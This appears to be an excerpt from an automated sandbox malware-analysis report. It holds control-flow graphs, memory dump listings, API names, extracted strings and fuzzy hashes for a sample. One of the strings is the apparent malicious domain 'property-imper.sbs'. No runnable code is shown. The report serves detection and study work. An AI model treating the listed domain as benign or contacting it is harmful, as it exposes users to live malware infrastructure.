                                                                                control_flow_graph 118 bb98f0-bb98fe 119 bb9e75 118->119 120 bb9904-bb997f call bb61a0 call bb82b0 118->120 121 bb9e77-bb9e83 119->121 126 bb9980-bb99b5 120->126 126->126 127 bb99b7-bb99df call bb9210 126->127 130 bb99e0-bb9a5b 127->130 130->130 131 bb9a5d-bb9a99 call bb9210 130->131 134 bb9aa0-bb9ae1 131->134 134->134 135 bb9ae3-bb9b2f call bb9210 134->135 138 bb9b30-bb9b56 135->138 138->138 139 bb9b58-bb9b6f 138->139 140 bb9b70-bb9bdc 139->140 140->140 141 bb9bde-bb9c0e call bb9210 140->141 144 bb9c10-bb9c6e 141->144 144->144 145 bb9c70-bb9d4b call bb94d0 144->145 148 bb9d50-bb9d7e 145->148 148->148 149 bb9d80-bb9d88 148->149 150 bb9d8a-bb9d92 149->150 151 bb9db1-bb9dbc 149->151 152 bb9da0-bb9daf 150->152 153 bb9dbe-bb9dc1 151->153 154 bb9de1-bb9e0b 151->154 152->151 152->152 155 bb9dd0-bb9ddf 153->155 156 bb9e10-bb9e36 154->156 155->154 155->155 156->156 157 bb9e38-bb9e58 call bbc570 call bb82c0 156->157 161 bb9e5d-bb9e73 157->161 161->121
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 12251195FFE4CC48D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                                • API String ID: 0-2550068365
                                                                                • Opcode ID: 777b4c0024700c20e20fdf46af0251161334463b8d97d9f3456e1fedfac927ac
                                                                                • Instruction ID: 38b14772116d2dde5c9464fc8814a07492679ea5fb6dea930335fbef4f9ff39c
                                                                                • Opcode Fuzzy Hash: 777b4c0024700c20e20fdf46af0251161334463b8d97d9f3456e1fedfac927ac
                                                                                • Instruction Fuzzy Hash: BFE16C72A483504BD328CF35C8513ABBBE6EBD1314F198A6DE5E58B391DB78C805CB42

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 162 bbe35b-bbe393 call be4600 call bb98f0 CoUninitialize 167 bbe3a0-bbe3d2 162->167 167->167 168 bbe3d4-bbe3ef 167->168 169 bbe3f0-bbe428 168->169 169->169 170 bbe42a-bbe499 169->170 171 bbe4a0-bbe4ba 170->171 171->171 172 bbe4bc-bbe4cd 171->172 173 bbe4eb-bbe4f3 172->173 174 bbe4cf-bbe4df 172->174 176 bbe50b-bbe515 173->176 177 bbe4f5-bbe4f6 173->177 175 bbe4e0-bbe4e9 174->175 175->173 175->175 179 bbe52b-bbe533 176->179 180 bbe517-bbe51b 176->180 178 bbe500-bbe509 177->178 178->176 178->178 182 bbe54b-bbe555 179->182 183 bbe535-bbe536 179->183 181 bbe520-bbe529 180->181 181->179 181->181 185 bbe56b-bbe577 182->185 186 bbe557-bbe55b 182->186 184 bbe540-bbe549 183->184 184->182 184->184 188 bbe579-bbe57b 185->188 189 bbe591-bbe6b3 185->189 187 bbe560-bbe569 186->187 187->185 187->187 190 bbe580-bbe58d 188->190 191 bbe6c0-bbe6da 189->191 190->190 193 bbe58f 190->193 191->191 192 bbe6dc-bbe70f 191->192 194 bbe710-bbe72b 192->194 193->189 194->194 195 bbe72d-bbe757 call bbb960 194->195 197 bbe75c-bbe77d 195->197
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Uninitialize
                                                                                • String ID: Lk$U\$Zb$property-imper.sbs$r
                                                                                • API String ID: 3861434553-2211913898
                                                                                • Opcode ID: 5e0700d9ef70107ec67235be62a62cb2541f876c1818ec83c14256078de2ed9f
                                                                                • Instruction ID: 18f99dfca683781c9a107cceafc5fcb3837bc81bbe67241c59eb3a472f60a225
                                                                                • Opcode Fuzzy Hash: 5e0700d9ef70107ec67235be62a62cb2541f876c1818ec83c14256078de2ed9f
                                                                                • Instruction Fuzzy Hash: 7BA19B7010C3D18BD7758F25C4947EBBBE1ABA3304F188A9CD0EA4B296DB798506CB57

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 226 bb89a0-bb89b1 call becb70 229 bb8cb3-bb8cbb ExitProcess 226->229 230 bb89b7-bb89cf call be6620 226->230 234 bb8cae call bedeb0 230->234 235 bb89d5-bb89fb 230->235 234->229 239 bb89fd-bb89ff 235->239 240 bb8a01-bb8bda 235->240 239->240 242 bb8c8a-bb8ca2 call bb9ed0 240->242 243 bb8be0-bb8c50 240->243 242->234 248 bb8ca4 call bbce80 242->248 244 bb8c52-bb8c54 243->244 245 bb8c56-bb8c88 243->245 244->245 245->242 250 bb8ca9 call bbb930 248->250 250->234
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(00000000), ref: 00BB8CB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 32d1af808abb8da98e4a568ba8c2e1baece9163497e03d660447e83d74f50fc3
                                                                                • Instruction ID: fc78aeb7a705191063ea43009a0fb2a0a1c6cc214f36fb9e7f4916df4f203357
                                                                                • Opcode Fuzzy Hash: 32d1af808abb8da98e4a568ba8c2e1baece9163497e03d660447e83d74f50fc3
                                                                                • Instruction Fuzzy Hash: 2A71E673B547040BC70CDEBAD89236AFAD6ABC8714F09D93D6988D7350EAB89C054685

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 control_flow_graph 252 bc9530-bc9551 253 bc9560-bc9569 252->253 253->253 254 bc956b-bc9573 253->254 255 bc9580-bc9589 254->255 255->255 256 bc958b-bc9597 255->256 257 bc9599-bc959e 256->257 258 bc95a0-bc95a2 256->258 259 bc95a9-bc95bb call bb82b0 257->259 258->259 262 bc95bd-bc95c3 259->262 263 bc95e1-bc95f2 259->263 264 bc95d0-bc95df 262->264 265 bc95f4-bc95fa 263->265 266 bc9613 263->266 264->263 264->264 267 bc9600-bc960f 265->267 268 bc9616-bc9639 call bf0480 266->268 267->267 269 bc9611 267->269 272 bc9640-bc9652 268->272 269->268 272->272 273 bc9654-bc965b 272->273 274 bc989f-bc98a9 call bb82c0 273->274 275 bc98b8-bc98bd call bb82c0 273->275 276 bc96da-bc96ea call be9800 273->276 277 bc9794-bc979f 273->277 278 bc9715-bc971a 273->278 279 bc96d0 273->279 280 bc96f0-bc96fd call be9800 273->280 281 bc96d2 273->281 282 bc98b2 273->282 283 bc996c-bc997f call bb82c0 273->283 284 bc9729-bc9744 call bf0480 273->284 285 bc9769-bc977e call bb82b0 call bf0880 273->285 286 bc96ca 273->286 287 bc974b-bc9762 call bf07b0 273->287 288 bc9706-bc970e 273->288 289 bc98c7-bc98db 273->289 290 bc9980 273->290 291 bc9721 273->291 292 bc9662-bc9676 273->292 293 bc9982-bc998b 273->293 274->282 308 bc98c2-bc98c4 275->308 276->280 299 bc97a0-bc97a9 277->299 278->274 278->275 278->277 278->282 278->283 278->285 278->287 278->289 278->290 278->291 278->293 280->288 281->276 283->290 284->274 284->275 284->277 284->282 284->283 284->285 284->287 284->289 284->290 284->291 284->293 320 bc9783-bc978d 285->320 286->279 287->274 287->275 287->277 287->282 287->283 287->285 287->289 287->290 287->293 288->274 288->275 288->277 288->278 288->282 288->283 288->284 288->285 288->287 288->289 288->290 288->291 288->293 298 bc98e0-bc98f4 289->298 291->284 300 bc9680-bc96b4 292->300 298->298 310 bc98f6-bc98fe 298->310 299->299 311 bc97ab-bc97b5 299->311 300->300 312 bc96b6-bc96c3 300->312 308->289 317 bc9937 310->317 318 bc9900-bc9911 310->318 319 bc97c0-bc97c9 311->319 312->274 312->275 312->276 312->277 312->278 312->279 312->280 312->281 312->282 312->283 312->284 312->285 312->286 312->287 312->288 312->289 312->290 312->291 312->293 324 bc9940-bc9946 317->324 321 bc9920-bc9927 318->321 319->319 322 bc97cb-bc97e3 319->322 320->274 320->275 320->277 320->282 320->283 320->289 320->290 320->293 323 bc9929-bc992c 321->323 321->324 325 bc97ec-bc97ef 322->325 326 bc97e5-bc97ea 322->326 323->321 327 bc992e 323->327 329 bc9948 324->329 330 bc9951-bc9963 call bedf70 324->330 328 bc97f6-bc9807 call bb82b0 325->328 326->328 327->317 335 bc9809-bc980f 328->335 336 bc9821-bc9835 328->336 329->330 330->283 337 bc9810-bc981f 335->337 338 bc9837-bc983a 336->338 339 bc9851-bc985f 336->339 337->336 337->337 340 bc9840-bc984f 338->340 341 bc9881-bc9897 call bb8fd0 339->341 342 bc9861-bc9864 339->342 340->339 340->340 341->274 343 bc9870-bc987f 342->343 343->341 343->343
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: efg`
                                                                                • API String ID: 0-115929991
                                                                                • Opcode ID: d88ea9583383c12e21214d60da3762e2de3d03647a161ed0020acfd4f0cf9b58
                                                                                • Instruction ID: 2664ca3aac39662df996e89e57204c7cea26018a988d3e4325d48f7678aed5a3
                                                                                • Opcode Fuzzy Hash: d88ea9583383c12e21214d60da3762e2de3d03647a161ed0020acfd4f0cf9b58
                                                                                • Instruction Fuzzy Hash: 69C103B1910215CBDB289F68DC92BBB73B4FF56310F1845ACE942A7391EB74A901C7A1

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: efg`
                                                                                • API String ID: 2994545307-115929991
                                                                                • Opcode ID: 41f19bf180e9397e2621a0f869a5da36c5367970992e3c8b23e4f09a4ad17042
                                                                                • Instruction ID: 6e6f4a5b37f46edb3d191da9b86fd3b1758b31d1cf50ca5cf0ddaf6af7eddd4a
                                                                                • Opcode Fuzzy Hash: 41f19bf180e9397e2621a0f869a5da36c5367970992e3c8b23e4f09a4ad17042
                                                                                • Instruction Fuzzy Hash: 1A5103B6A043505BD720EB609C927FF72D7AFD1304F1944A8E98967352DFB0AA02C693

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 496 bf1580-bf158f 497 bf15b3-bf15bc 496->497 498 bf1591 496->498 500 bf15be-bf15c1 497->500 501 bf15c3-bf15e4 497->501 499 bf15a0-bf15a8 498->499 499->499 502 bf15aa-bf15ad 499->502 500->501 503 bf15f0-bf1618 501->503 502->497 503->503 504 bf161a-bf1624 503->504 505 bf166f-bf167b 504->505 506 bf1626-bf162f 504->506 508 bf1680-bf169a 505->508 507 bf1630-bf1637 506->507 509 bf1639-bf163c 507->509 510 bf1640-bf1646 507->510 508->508 511 bf169c-bf169f 508->511 509->507 512 bf163e 509->512 510->505 513 bf1648-bf1665 call bedf70 510->513 514 bf189f-bf18a8 511->514 515 bf16a5-bf16cf call beb7e0 511->515 512->505 518 bf166a-bf166d 513->518 520 bf16d0-bf1754 515->520 518->505 520->520 521 bf175a-bf1776 520->521 522 bf1780-bf17a8 521->522 522->522 523 bf17aa-bf17b9 522->523 524 bf17bb-bf17c3 523->524 525 bf1813-bf1815 523->525 526 bf17d0-bf17d7 524->526 527 bf1817-bf181d 525->527 528 bf1893-bf189c call beb860 525->528 529 bf17d9-bf17dc 526->529 530 bf17e0-bf17e6 526->530 532 bf181f-bf1826 527->532 533 bf1828-bf182a 527->533 528->514 529->526 534 bf17de 529->534 530->525 536 bf17e8-bf1809 call bedf70 530->536 532->533 533->528 537 bf182c-bf1831 533->537 534->525 543 bf180e-bf1811 536->543 538 bf188a-bf1891 537->538 539 bf1833-bf183e 537->539 538->528 541 bf1842-bf187e 539->541 542 bf1840 539->542 541->538 544 bf1880-bf1887 541->544 542->541 543->525 544->538
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ae9461e70fb8af244f8b369f843bb8241012eae3e07a60abf5bb40a182d164d7
                                                                                • Instruction ID: b4ea4651398e4211ce838b7fc9e6c73780d684b6294e87f593c99b7fff353d4c
                                                                                • Opcode Fuzzy Hash: ae9461e70fb8af244f8b369f843bb8241012eae3e07a60abf5bb40a182d164d7
                                                                                • Instruction Fuzzy Hash: 4C81F1726083459FD714DE68D850A3BB7E2EB89310F088C7CEA95D7291E771DC49C782

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 545 bf0c80-bf0ca7 546 bf0cb0-bf0cd8 545->546 546->546 547 bf0cda-bf0ce4 546->547 548 bf0d2e-bf0d46 547->548 549 bf0ce6-bf0cef 547->549 550 bf0d50-bf0d77 548->550 551 bf0cf0-bf0cf7 549->551 550->550 552 bf0d79-bf0d7c 550->552 553 bf0cf9-bf0cfc 551->553 554 bf0d00-bf0d06 551->554 555 bf0d82-bf0dab call beb7e0 552->555 556 bf0f50-bf0f59 552->556 553->551 557 bf0cfe 553->557 554->548 558 bf0d08-bf0d24 call bedf70 554->558 563 bf0db0-bf0dd9 555->563 557->548 561 bf0d29-bf0d2c 558->561 561->548 563->563 564 bf0ddb-bf0de6 563->564 565 bf0de8-bf0df6 564->565 566 bf0e50-bf0e52 564->566 569 bf0e00-bf0e08 565->569 567 bf0e58-bf0e5a 566->567 568 bf0f47-bf0f4d call beb860 566->568 567->568 570 bf0e60-bf0e62 567->570 568->556 572 bf0e0a-bf0e0d 569->572 573 bf0e13-bf0e1f 569->573 574 bf0f3f-bf0f44 570->574 575 bf0e68-bf0e72 570->575 572->569 577 bf0e0f-bf0e11 572->577 573->566 578 bf0e21-bf0e40 call bedf70 573->578 574->568 580 bf0e76-bf0e78 575->580 581 bf0e74 575->581 582 bf0e4c 577->582 583 bf0e45-bf0e4a 578->583 584 bf0e7e-bf0e8a 580->584 585 bf0f36-bf0f3b 580->585 581->580 582->566 583->582 586 bf0ecc-bf0ed1 584->586 587 bf0e8c-bf0e92 584->587 585->574 586->585 589 bf0ed3 586->589 588 bf0ea0-bf0eb7 587->588 588->588 591 bf0eb9-bf0ec8 588->591 590 bf0ee0-bf0f30 589->590 590->590 592 bf0f32 590->592 591->590 593 bf0eca 591->593 592->585 593->585
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a4c202cf34a8520a4d07bae43c6ecd94b949db6c81fee3c089fa3eeaae97c3fc
                                                                                • Instruction ID: 124c01e097f40fbb97c09b94c55972569bec31b72acb3cc463474269f0a636c2
                                                                                • Opcode Fuzzy Hash: a4c202cf34a8520a4d07bae43c6ecd94b949db6c81fee3c089fa3eeaae97c3fc
                                                                                • Instruction Fuzzy Hash: F47137355183499BC714AB28D850B3FB3E2FFD4710F15D9ACEA858B266DB309C55C782
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6dafdd8424afcdd590ff13687e35476551df217a75107c04fd007f6c8d010c42
                                                                                • Instruction ID: d3b7def40e4b9ed21bd9898793fd25cdeb69683583f6c575835a69d04ebe0d63
                                                                                • Opcode Fuzzy Hash: 6dafdd8424afcdd590ff13687e35476551df217a75107c04fd007f6c8d010c42
                                                                                • Instruction Fuzzy Hash: 66517936A083918BD7209F2A9840A3BB7E2EBD5720F29D6BCD9D527351DB31DC02C781
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1420326579.0000000001561000.00000004.00000020.00020000.00000000.sdmp, Offset: 01561000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_155f000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: I$M
                                                                                • API String ID: 0-2039460822
                                                                                • Opcode ID: 743f49929503bcd1b2dad5dfc31364cc9a4faf4d3ae9c6f89ed78d1ea676d02d
                                                                                • Instruction ID: 30f882a7e8f44c6f567714f97f6801f98a8a0e4fc513ea78af000421977190cd
                                                                                • Opcode Fuzzy Hash: 743f49929503bcd1b2dad5dfc31364cc9a4faf4d3ae9c6f89ed78d1ea676d02d
                                                                                • Instruction Fuzzy Hash: D481226254E7C15FD3438B749CA99923FB4AE23624B1E46DBC8C4CF0A3E218594EC763
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                • Associated: 00000000.00000003.1420196601.000000000156D000.00000004.00000020.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_156d000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d0e1af92450174d005f28d2102a287a7c4ee5600f90225c0486865ff989e4a51
                                                                                • Instruction ID: bbbb5a6b6798deb9ead863c5180a28a3657410d91f9827d270029d0f59aeeb69
                                                                                • Opcode Fuzzy Hash: d0e1af92450174d005f28d2102a287a7c4ee5600f90225c0486865ff989e4a51
                                                                                • Instruction Fuzzy Hash: 9612AD9551E7C16FD3238B359C69A9A7F75AF43224B1E82DFD0C08E4A3E3694809C763
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, Offset: 01573000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_156d000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
